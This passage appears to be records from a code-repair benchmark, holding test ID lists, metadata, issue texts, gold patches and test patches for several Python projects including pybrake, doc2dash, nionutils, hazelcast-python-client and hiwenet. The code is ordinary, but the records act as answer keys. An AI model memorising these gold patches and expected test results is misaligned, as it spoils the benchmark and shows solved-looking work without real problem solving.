"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1000-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1000-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1000-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1001-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1001-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1001-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1002-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1002-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1002-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1003-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1003-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1003-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-995-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-995-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-995-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-996-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-996-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-996-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-997-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-997-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-997-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-998-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-998-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-998-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-999-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-999-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-999-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1000-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1000-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1000-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1001-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1001-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1001-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1002-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1002-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1002-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1003-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1003-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1003-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-995-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-995-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-995-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-996-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-996-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-996-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-997-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-997-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-997-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-998-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-998-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-998-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-999-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-999-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-999-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1000-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1000-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1000-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1001-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1001-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1001-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1002-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1002-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1002-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1003-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1003-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1003-4]",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_raises_value_error_on_lazy_cuts_input",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_with_lazy_cuts[SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_with_lazy_cuts[DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_with_lazy_cuts_concat[SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_with_lazy_cuts_concat[DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_filter[SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_filter[BucketingSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_filter[DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_filter",
"test/dataset/sampling/test_sampling.py::test_zip_sampler_merge_batches_true",
"test/dataset/sampling/test_sampling.py::test_zip_sampler_cut_pairs_merge_batches_true",
"test/dataset/sampling/test_sampling.py::test_zip_sampler_merge_batches_false",
"test/dataset/sampling/test_sampling.py::test_round_robin_sampler",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_drop_last[SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_drop_last[DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_drop_last[False]",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_drop_last[True]",
"test/dataset/sampling/test_sampling.py::test_sampler_get_report[<lambda>0]",
"test/dataset/sampling/test_sampling.py::test_sampler_get_report[<lambda>1]",
"test/dataset/sampling/test_sampling.py::test_sampler_get_report[<lambda>2]",
"test/dataset/sampling/test_sampling.py::test_sampler_get_report[<lambda>3]",
"test/dataset/sampling/test_sampling.py::test_sampler_get_report[<lambda>4]",
"test/dataset/sampling/test_sampling.py::test_sampler_get_report[<lambda>5]",
"test/dataset/sampling/test_sampling.py::test_sampler_get_report[<lambda>6]",
"test/dataset/sampling/test_sampling.py::test_sampler_diagnostics_accumulate_across_epochs[<lambda>0]",
"test/dataset/sampling/test_sampling.py::test_sampler_diagnostics_accumulate_across_epochs[<lambda>1]",
"test/dataset/sampling/test_sampling.py::test_sampler_diagnostics_accumulate_across_epochs[<lambda>2]",
"test/dataset/sampling/test_sampling.py::test_sampler_diagnostics_accumulate_across_epochs[<lambda>3]",
"test/dataset/sampling/test_sampling.py::test_sampler_diagnostics_accumulate_across_epochs[<lambda>4]",
"test/dataset/sampling/test_sampling.py::test_sampler_diagnostics_accumulate_across_epochs[<lambda>5]",
"test/dataset/sampling/test_sampling.py::test_sampler_diagnostics_accumulate_across_epochs[<lambda>6]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_lazy_shuffle[SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_lazy_shuffle[DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_lazy_shuffle[CutPairsSampler]",
"test/dataset/sampling/test_sampling.py::test_streaming_shuffle[100-10]",
"test/dataset/sampling/test_sampling.py::test_streaming_shuffle[100-1000]",
"test/dataset/sampling/test_sampling.py::test_streaming_shuffle[100-20000]",
"test/dataset/sampling/test_sampling.py::test_streaming_shuffle[1000-10]",
"test/dataset/sampling/test_sampling.py::test_streaming_shuffle[1000-1000]",
"test/dataset/sampling/test_sampling.py::test_streaming_shuffle[1000-20000]",
"test/dataset/sampling/test_sampling.py::test_streaming_shuffle[10000-10]",
"test/dataset/sampling/test_sampling.py::test_streaming_shuffle[10000-1000]",
"test/dataset/sampling/test_sampling.py::test_streaming_shuffle[10000-20000]",
"test/dataset/sampling/test_sampling.py::test_sampler_properties[sampler0]",
"test/dataset/sampling/test_sampling.py::test_sampler_properties[sampler1]",
"test/dataset/sampling/test_sampling.py::test_sampler_properties[sampler2]",
"test/dataset/sampling/test_sampling.py::test_sampler_properties[sampler3]",
"test/dataset/sampling/test_sampling.py::test_sampler_properties[sampler4]",
"test/dataset/sampling/test_sampling.py::test_report_padding_ratio_estimate",
"test/dataset/sampling/test_sampling.py::test_time_constraint_strictness",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[1-SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[1-DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[1-sampler_fn2]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[1-sampler_fn3]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[2-SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[2-DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[2-sampler_fn2]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[2-sampler_fn3]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[3-SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[3-DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[3-sampler_fn2]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[3-sampler_fn3]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[4-SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[4-DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[4-sampler_fn2]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[4-sampler_fn3]"
] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2022-05-27 00:33:01+00:00
|
apache-2.0
| 3,561
|
|
airbrake__pybrake-77
|
diff --git a/pybrake/notifier.py b/pybrake/notifier.py
index 9218c51..c673108 100644
--- a/pybrake/notifier.py
+++ b/pybrake/notifier.py
@@ -295,7 +295,7 @@ class Notifier:
needed = "/site-packages/"
ind = s.find(needed)
if ind > -1:
- s = "[SITE_PACKAGES]/" + s[ind + len(needed) :]
+ s = "/SITE_PACKAGES/" + s[ind + len(needed) :]
return s
s = s.replace(self._context["rootDirectory"], "/PROJECT_ROOT")
|
airbrake/pybrake
|
6970c56dfd3cf8caba339321f020ebc04d8129b0
|
diff --git a/pybrake/test_notifier.py b/pybrake/test_notifier.py
index e7bc2d9..8774ef8 100644
--- a/pybrake/test_notifier.py
+++ b/pybrake/test_notifier.py
@@ -205,3 +205,9 @@ def _test_rate_limited():
notice = future.result()
assert notice["error"] == "IP is rate limited"
+
+def test_clean_filename():
+ notifier = Notifier()
+
+ filename = notifier._clean_filename("home/lib/python3.6/site-packages/python.py")
+ assert filename == "/SITE_PACKAGES/python.py"
|
[SITE_PACKAGES] -> /SITE_PACKAGES
https://github.com/airbrake/pybrake/blob/master/pybrake/notifier.py#L298
|
0.0
|
6970c56dfd3cf8caba339321f020ebc04d8129b0
|
[
"pybrake/test_notifier.py::test_clean_filename"
] |
[
"pybrake/test_notifier.py::test_build_notice_from_exception",
"pybrake/test_notifier.py::test_build_notice_from_str",
"pybrake/test_notifier.py::test_build_notice_from_none",
"pybrake/test_notifier.py::test_environment",
"pybrake/test_notifier.py::test_root_directory",
"pybrake/test_notifier.py::test_filter_data",
"pybrake/test_notifier.py::test_filter_ignore",
"pybrake/test_notifier.py::test_filter_ignore_async",
"pybrake/test_notifier.py::test_unknown_host",
"pybrake/test_notifier.py::test_truncation",
"pybrake/test_notifier.py::test_revision_override",
"pybrake/test_notifier.py::test_revision_from_git",
"pybrake/test_notifier.py::test_keys_blacklist_exact",
"pybrake/test_notifier.py::test_keys_blacklist_regexp"
] |
{
"failed_lite_validators": [
"has_short_problem_statement"
],
"has_test_patch": true,
"is_lite": false
}
|
2019-03-23 12:37:51+00:00
|
mit
| 976
|
|
hynek__doc2dash-201
|
diff --git a/CHANGELOG.md b/CHANGELOG.md
index aa5dda5..12fe351 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -14,6 +14,9 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
- Support for 2x icons using the `--icon-2x` option.
[#200](https://github.com/hynek/doc2dash/pull/200)
+- Support for linking to [docset playgrounds](https://kapeli.com/docsets#docsetPlaygrounds) using the `--playground-url` option.
+ [#201](https://github.com/hynek/doc2dash/pull/201)
+
### Fixed
diff --git a/docs/usage.md b/docs/usage.md
index 5bae7d0..c50e7fc 100644
--- a/docs/usage.md
+++ b/docs/usage.md
@@ -18,3 +18,5 @@ Basic usage is as simple as:
:prog_name: doc2dash
:style: table
:depth: 1
+
+Refer to our [how-to](how-to.md) and the official [*Docset Generation Guide*](https://kapeli.com/docsets) to learn what those options are good for.
diff --git a/src/doc2dash/__main__.py b/src/doc2dash/__main__.py
index 39d0eb6..e457c6a 100644
--- a/src/doc2dash/__main__.py
+++ b/src/doc2dash/__main__.py
@@ -136,6 +136,7 @@ IMPORTABLE = ImportableType()
"-u",
help="The base URL of the online documentation.",
)
+@click.option("--playground-url", help="The URL to a docset playground.")
@click.option(
"--parser",
"parser_type",
@@ -160,6 +161,7 @@ def main(
enable_js: bool,
online_redirect_url: str | None,
parser_type: type[Parser] | None,
+ playground_url: str | None,
) -> None:
"""
Convert docs from SOURCE to Dash's docset format.
@@ -222,6 +224,7 @@ def main(
index_page,
enable_js,
online_redirect_url,
+ playground_url,
icon,
icon_2x,
)
diff --git a/src/doc2dash/docsets.py b/src/doc2dash/docsets.py
index 1a4146e..5763dbc 100644
--- a/src/doc2dash/docsets.py
+++ b/src/doc2dash/docsets.py
@@ -37,6 +37,7 @@ def prepare_docset(
index_page: Path | None,
enable_js: bool,
online_redirect_url: str | None,
+ playground_url: str | None,
icon: Path | None,
icon_2x: Path | None,
) -> DocSet:
@@ -71,6 +72,8 @@ def prepare_docset(
plist_cfg["dashIndexFilePath"] = str(index_page)
if online_redirect_url is not None:
plist_cfg["DashDocSetFallbackURL"] = online_redirect_url
+ if playground_url is not None:
+ plist_cfg["DashDocSetPlayURL"] = playground_url
write_plist(plist_cfg, plist_path)
|
hynek/doc2dash
|
e8a4f374588dfb054cb1d984c9c5e72821588528
|
diff --git a/tests/test_docsets.py b/tests/test_docsets.py
index edbcae1..572419e 100644
--- a/tests/test_docsets.py
+++ b/tests/test_docsets.py
@@ -28,6 +28,7 @@ class TestPrepareDocset:
index_page=None,
enable_js=False,
online_redirect_url=None,
+ playground_url=None,
icon=None,
icon_2x=None,
)
@@ -72,6 +73,7 @@ class TestPrepareDocset:
index_page="foo.html",
enable_js=False,
online_redirect_url=None,
+ playground_url=None,
icon=None,
icon_2x=None,
)
@@ -105,6 +107,7 @@ class TestPrepareDocset:
index_page="foo.html",
enable_js=True,
online_redirect_url=None,
+ playground_url=None,
icon=None,
icon_2x=None,
)
@@ -138,6 +141,7 @@ class TestPrepareDocset:
index_page="foo.html",
enable_js=False,
online_redirect_url="https://domain.com",
+ playground_url=None,
icon=None,
icon_2x=None,
)
@@ -156,6 +160,41 @@ class TestPrepareDocset:
"DashDocSetFallbackURL": "https://domain.com",
}
+ def test_with_playground_url(self, monkeypatch, tmp_path):
+ """
+ If a playground URL is passed, it is added to the plist.
+ """
+ monkeypatch.chdir(tmp_path)
+ m_ct = Mock()
+ monkeypatch.setattr(shutil, "copytree", m_ct)
+ (tmp_path / "bar").mkdir()
+
+ docset = docsets.prepare_docset(
+ Path("some/path/foo"),
+ Path("bar"),
+ name="foo",
+ index_page="foo.html",
+ enable_js=False,
+ online_redirect_url=None,
+ playground_url="https://repl.it/F9J7/1",
+ icon=None,
+ icon_2x=None,
+ )
+
+ p = docsets.read_plist(docset.plist)
+
+ assert p == {
+ "CFBundleIdentifier": "foo",
+ "CFBundleName": "foo",
+ "DocSetPlatformFamily": "foo",
+ "DashDocSetFamily": "python",
+ "DashDocSetDeclaredInStyle": "originalName",
+ "isDashDocset": True,
+ "dashIndexFilePath": "foo.html",
+ "isJavaScriptEnabled": False,
+ "DashDocSetPlayURL": "https://repl.it/F9J7/1",
+ }
+
def test_with_icon(self, tmp_path, sphinx_built):
"""
If an icon is passed, it's copied to the root of the docset.
@@ -170,6 +209,7 @@ class TestPrepareDocset:
index_page=None,
enable_js=False,
online_redirect_url=None,
+ playground_url=None,
icon=icon,
icon_2x=None,
)
@@ -190,6 +230,7 @@ class TestPrepareDocset:
index_page=None,
enable_js=False,
online_redirect_url=None,
+ playground_url=None,
icon=None,
icon_2x=icon,
)
diff --git a/tests/test_main.py b/tests/test_main.py
index 6897951..783f0e7 100644
--- a/tests/test_main.py
+++ b/tests/test_main.py
@@ -198,6 +198,7 @@ def test_normal_flow(monkeypatch, tmp_path, runner):
index_page,
enable_js,
online_redirect_url,
+ playground_url,
icon,
icon_2x,
):
|
Add support for Docset Playgrounds
https://kapeli.com/docsets#docsetPlaygrounds
|
0.0
|
e8a4f374588dfb054cb1d984c9c5e72821588528
|
[
"tests/test_docsets.py::TestPrepareDocset::test_plist_creation",
"tests/test_docsets.py::TestPrepareDocset::test_with_index_page",
"tests/test_docsets.py::TestPrepareDocset::test_with_javascript_enabled",
"tests/test_docsets.py::TestPrepareDocset::test_with_online_redirect_url",
"tests/test_docsets.py::TestPrepareDocset::test_with_playground_url",
"tests/test_docsets.py::TestPrepareDocset::test_with_icon",
"tests/test_docsets.py::TestPrepareDocset::test_with_icon_2x",
"tests/test_main.py::test_normal_flow"
] |
[
"tests/test_main.py::test_intersphinx",
"tests/test_main.py::TestArguments::test_fails_with_unknown_icon",
"tests/test_main.py::TestArguments::test_fails_with_missing_index_page",
"tests/test_main.py::TestArguments::test_handles_unknown_doc_types",
"tests/test_main.py::TestArguments::test_quiet_and_verbose_conflict",
"tests/test_main.py::TestArguments::test_fails_if_supplied_parser_fails",
"tests/test_main.py::TestSetupPaths::test_works",
"tests/test_main.py::TestSetupPaths::test_add_to_global_overrides_destination",
"tests/test_main.py::TestSetupPaths::test_detects_existing_dest"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_hyperlinks",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2024-01-14 13:01:38+00:00
|
mit
| 2,770
|
|
nion-software__nionutils-19
|
diff --git a/nion/utils/Converter.py b/nion/utils/Converter.py
index 8bfacb2..178a127 100644
--- a/nion/utils/Converter.py
+++ b/nion/utils/Converter.py
@@ -43,7 +43,7 @@ class IntegerToStringConverter(ConverterLike[int, str]):
def convert_back(self, formatted_value: typing.Optional[str]) -> typing.Optional[int]:
""" Convert string to value using standard int conversion """
- formatted_value = re.sub("[^0-9]", "", formatted_value) if self.__fuzzy and formatted_value else None
+ formatted_value = re.sub("[+-](?!\d)|(?<=\.)\w*|[^-+0-9]", "", formatted_value) if self.__fuzzy and formatted_value else None
if formatted_value:
return int(formatted_value)
else:
|
nion-software/nionutils
|
c4b09457ab9433dde6f224279fe8f35265c6c041
|
diff --git a/nion/utils/test/Converter_test.py b/nion/utils/test/Converter_test.py
index 2fcbf1b..65b8717 100644
--- a/nion/utils/test/Converter_test.py
+++ b/nion/utils/test/Converter_test.py
@@ -23,6 +23,12 @@ class TestConverter(unittest.TestCase):
self.assertAlmostEqual(converter.convert_back(converter.convert(-100)) or 0.0, -100)
self.assertAlmostEqual(converter.convert_back(converter.convert(100)) or 0.0, 100)
+ def test_integer_to_string_converter(self) -> None:
+ converter = Converter.IntegerToStringConverter()
+ self.assertEqual(converter.convert_back("-1"), -1)
+ self.assertEqual(converter.convert_back("2.45653"), 2)
+ self.assertEqual(converter.convert_back("-adcv-2.15sa56aas"), -2)
+ self.assertEqual(converter.convert_back("xx4."), 4)
if __name__ == '__main__':
|
Regex in IntegerToStringConverter not handling negative numbers
https://github.com/nion-software/nionutils/blob/c4b09457ab9433dde6f224279fe8f35265c6c041/nion/utils/Converter.py#L46
This regex is not sufficient to properly handle negative numbers. It will also fail to convert floating point numbers. See the following examples:
```
from nion.utils import Converter
conv = Converter.IntegerToStringConverter()
conv.convert_back("-1")
>>> 1
conv.convert_back("1.243")
>>> 1243
|
0.0
|
c4b09457ab9433dde6f224279fe8f35265c6c041
|
[
"nion/utils/test/Converter_test.py::TestConverter::test_integer_to_string_converter"
] |
[
"nion/utils/test/Converter_test.py::TestConverter::test_float_to_scaled_integer_with_negative_min"
] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2022-05-13 12:15:05+00:00
|
apache-2.0
| 4,177
|
|
hazelcast__hazelcast-python-client-257
|
diff --git a/hazelcast/serialization/input.py b/hazelcast/serialization/input.py
index dcc68ca..cc6c387 100644
--- a/hazelcast/serialization/input.py
+++ b/hazelcast/serialization/input.py
@@ -36,7 +36,14 @@ class _ObjectDataInput(ObjectDataInput):
self._pos += _len
def skip_bytes(self, count):
- raise NotImplementedError("skip_bytes not implemented!!!")
+ if count <= 0:
+ return 0
+
+ if self._pos + count > self._size:
+ count = self._size - self._pos
+
+ self._pos += count
+ return count
def read_boolean(self, position=None):
return self.read_byte(position) != 0
|
hazelcast/hazelcast-python-client
|
766c61257c44094cd61efe057697fa45e8c64487
|
diff --git a/tests/serialization/input_test.py b/tests/serialization/input_test.py
index 71ae9a6..c17da70 100644
--- a/tests/serialization/input_test.py
+++ b/tests/serialization/input_test.py
@@ -51,6 +51,21 @@ class InputTestCase(unittest.TestCase):
self.assertEqual(0, initial_pos)
self.assertEqual(six.unichr(0x00e7), char)
+ def test_skip_bytes(self):
+ inp = _ObjectDataInput(bytearray(10))
+ self.assertEqual(0, inp.position())
+ self.assertEqual(4, inp.skip_bytes(4))
+ self.assertEqual(4, inp.position())
-if __name__ == '__main__':
- unittest.main()
+ def test_skip_bytes_when_count_greater_than_remaining(self):
+ inp = _ObjectDataInput(bytearray(10))
+ inp.set_position(8)
+ self.assertEqual(2, inp.skip_bytes(4))
+ self.assertEqual(10, inp.position())
+
+ def test_skip_bytes_when_count_is_not_positive(self):
+ inp = _ObjectDataInput(bytearray(10))
+ self.assertEqual(0, inp.skip_bytes(0))
+ self.assertEqual(0, inp.position())
+ self.assertEqual(0, inp.skip_bytes(-1))
+ self.assertEqual(0, inp.position())
|
Implement ObjectDataInput#skip_bytes
It seems that we didn't implement `skip_bytes` method yet. We should do that similar to the Java client.
https://github.com/hazelcast/hazelcast/blob/master/hazelcast/src/main/java/com/hazelcast/internal/serialization/impl/ByteArrayObjectDataInput.java#L598
|
0.0
|
766c61257c44094cd61efe057697fa45e8c64487
|
[
"tests/serialization/input_test.py::InputTestCase::test_skip_bytes",
"tests/serialization/input_test.py::InputTestCase::test_skip_bytes_when_count_greater_than_remaining",
"tests/serialization/input_test.py::InputTestCase::test_skip_bytes_when_count_is_not_positive"
] |
[
"tests/serialization/input_test.py::InputTestCase::test_bool_array",
"tests/serialization/input_test.py::InputTestCase::test_char_be",
"tests/serialization/input_test.py::InputTestCase::test_char_le",
"tests/serialization/input_test.py::InputTestCase::test_int_array",
"tests/serialization/input_test.py::InputTestCase::test_short_array"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_hyperlinks"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-12-02 09:48:01+00:00
|
apache-2.0
| 2,708
|
|
raamana__hiwenet-12
|
diff --git a/hiwenet/__init__.py b/hiwenet/__init__.py
index 07c8a69..98bbb16 100644
--- a/hiwenet/__init__.py
+++ b/hiwenet/__init__.py
@@ -4,16 +4,19 @@
"""
+__all__ = ['extract', 'pairwise_dist', 'run_cli', 'more_metrics']
+
from sys import version_info
if version_info.major==2 and version_info.minor==7:
- from hiwenet import extract, run_cli
+ import more_metrics
+ from pairwise_dist import extract, run_cli
elif version_info.major > 2:
- from hiwenet.hiwenet import extract, run_cli
+ from hiwenet import more_metrics
+ from hiwenet.pairwise_dist import extract, run_cli
else:
- raise NotImplementedError('hiwenet supports only 2.7.13 or 3+. Upgrade to Python 3+ is recommended.')
+ raise NotImplementedError('hiwenet supports only 2.7 or 3+. Upgrade to Python 3+ is recommended.')
-__all__ = ['extract', 'hiwenet', 'run_cli']
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
diff --git a/hiwenet/__main__.py b/hiwenet/__main__.py
index a764b5b..01b6612 100644
--- a/hiwenet/__main__.py
+++ b/hiwenet/__main__.py
@@ -1,9 +1,9 @@
from sys import version_info
if version_info.major==2 and version_info.minor==7:
- from hiwenet import run_cli
+ from pairwise_dist import run_cli
elif version_info.major > 2:
- from hiwenet.hiwenet import run_cli
+ from hiwenet.pairwise_dist import run_cli
else:
raise NotImplementedError('hiwenet supports only 2.7.13 or 3+. Upgrade to Python 3+ is recommended.')
diff --git a/hiwenet/more_metrics.py b/hiwenet/more_metrics.py
new file mode 100644
index 0000000..4826d5d
--- /dev/null
+++ b/hiwenet/more_metrics.py
@@ -0,0 +1,76 @@
+"""
+Module implementing additional metrics for edge weights.
+
+"""
+
+__all__ = ['diff_medians', 'diff_medians_abs']
+
+import numpy as np
+
+def check_array(array):
+ "Converts to flattened numpy arrays and ensures its not empty."
+
+ if len(array) < 1:
+ raise ValueError('Input array is empty! Must have atleast 1 element.')
+
+ return np.array(array).flatten()
+
+
+def diff_medians(array_one, array_two):
+ """
+ Computes the difference medians between two arrays of values.
+
+ Given arrays will be flattened (to 1D array) regardless of dimension,
+ and any bon-finite/NaN values will be ignored.
+
+ Parameters
+ ----------
+ array_one, array_two : iterable
+ Two arrays of values, possibly of different length.
+
+ Returns
+ -------
+ diff_medians : float
+ scalar measuring the difference in medians, ignoring NaNs/non-finite values.
+
+ Raises
+ ------
+ ValueError
+ If one or more of the arrays are empty.
+
+ """
+
+ array_one = check_array(array_one)
+ array_two = check_array(array_two)
+ diff_medians = np.median(array_one) - np.median(array_two)
+
+ return diff_medians
+
+
+def diff_medians_abs(array_one, array_two):
+ """
+ Computes the absolute difference (symmetric) medians between two arrays of values.
+
+ Given arrays will be flattened (to 1D array) regardless of dimension,
+ and any bon-finite/NaN values will be ignored.
+
+ Parameters
+ ----------
+ array_one, array_two : iterable
+ Two arrays of values, possibly of different length.
+
+ Returns
+ -------
+ diff_medians : float
+ scalar measuring the difference in medians, ignoring NaNs/non-finite values.
+
+ Raises
+ ------
+ ValueError
+ If one or more of the arrays are empty.
+
+ """
+
+ abs_diff_medians = np.abs(diff_medians(array_one, array_two))
+
+ return abs_diff_medians
\ No newline at end of file
diff --git a/hiwenet/hiwenet.py b/hiwenet/pairwise_dist.py
similarity index 96%
rename from hiwenet/hiwenet.py
rename to hiwenet/pairwise_dist.py
index 39b2518..67aa786 100644
--- a/hiwenet/hiwenet.py
+++ b/hiwenet/pairwise_dist.py
@@ -10,6 +10,14 @@ import logging
import networkx as nx
import numpy as np
from os.path import join as pjoin, exists as pexists
+from sys import version_info
+
+if version_info.major==2 and version_info.minor==7:
+ import more_metrics
+elif version_info.major > 2:
+ from hiwenet import more_metrics
+else:
+ raise NotImplementedError('hiwenet supports only 2.7 or 3+. Upgrade to Python 3+ is recommended.')
list_medpy_histogram_metrics = np.array([
'chebyshev', 'chebyshev_neg', 'chi_square',
@@ -37,7 +45,7 @@ semi_metric_list = [
'noelle_1', 'noelle_3',
'correlate_1']
-metrics_on_original_features = ['diff_medians', ]
+metrics_on_original_features = ['diff_medians', 'diff_medians_abs']
minimum_num_bins = 5
